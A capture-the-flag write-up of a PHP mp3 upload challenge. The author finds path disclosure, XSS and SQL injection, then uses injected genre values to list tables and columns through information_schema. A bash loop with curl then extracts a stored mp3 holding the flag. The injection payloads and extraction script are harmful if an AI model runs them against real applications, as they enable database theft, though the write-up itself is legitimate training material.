Puzzle given to us:
Web application given to us contains
- index page
- upload page (for uploading of mp3)
- player page (for playing of uploaded mp3)
- request_mp3 page (for downloading of mp3)
Question: What song is the administrator listening to?
Recommended Tools:
Live HTTP Headers (https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/)
Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)
Analysing the File:
There are 3 vulnerabilities here... but only 1 is useful for this puzzle
- Full Path Disclosure via local file inclusion found this in the url where the page is redirect via ?page=upload or ?page=
- XSS via inserting script in the title text field in upload page
- SQL Injection in the genre filed in upload page
Solving the Puzzle:
The SQL Injection was found through the use of Tamper data while uploading a mp3. By modifying the integer value of the genre from "1" to " 1' " resulted in failure to upload the mp3 file. Although no error appears, but it does seems that there is a sql error. I would image the backend sql code to be something like the following
INSERT INTO xxx (a,b,c,d) VALUES (a,b,genre,title,d)So my attack begins by changing the genre post value to 1, database())#
yeah the attack works! now the upload page display the uploaded file title to the name of the database
Ok, lets begin our attack... using genre field
Get the table names from the database. It is noted that there are tons of tables in the database and it is in this order upload_mp3_ip_address
1, (SELECT table_name FROM information_schema.tables where table_schema=database())#
Get the column name from the table (we use hex to by pass single quote problem in the sql statement) the fields dump are idx, genre, title, file
1, (SELECT column_name FROM information_schema.columns where table_name=0xhextablename)#Dump the fields
1, (SELECT group_concat(title, 0x3a, file) from upload_mp3_127_0_0_1)#Damn the file field looks empty... or is it? lets try this
1, (SELECT length(file) from upload_mp3_127_0_0_1)#damn the size is big...
let's write a bash to dump... .
>> for i in `seq 0 32767 393204`; do ./vuln100.sh "SELECT hex(substring(file,$i,32767)) FROM upload_mp3_127_0_0_1" | xxd -r -p - >>vuln100.mp3; done;
vuln100.shAfter running the bash script...
curl -s "http://1.234.41.8:7856/mp3_world/?page=upload" -F "mp3=@a.mp3;filename=mp3.mp3" -F "genre=2,($1))#" -F "title=a" 2>/dev/null >/dev/null
curl -s "http://1.234.41.8:7856/mp3_world/?page=player" | grep "name:" | awk -F "dance" '{print $2}' | awk -F '",filename' '{ print $1 }' | cut -c 2-
a mp3 is formed...
with the solutions in the audio.. UPL04DNPL4D
cheers
Elucidator
No comments:
Post a Comment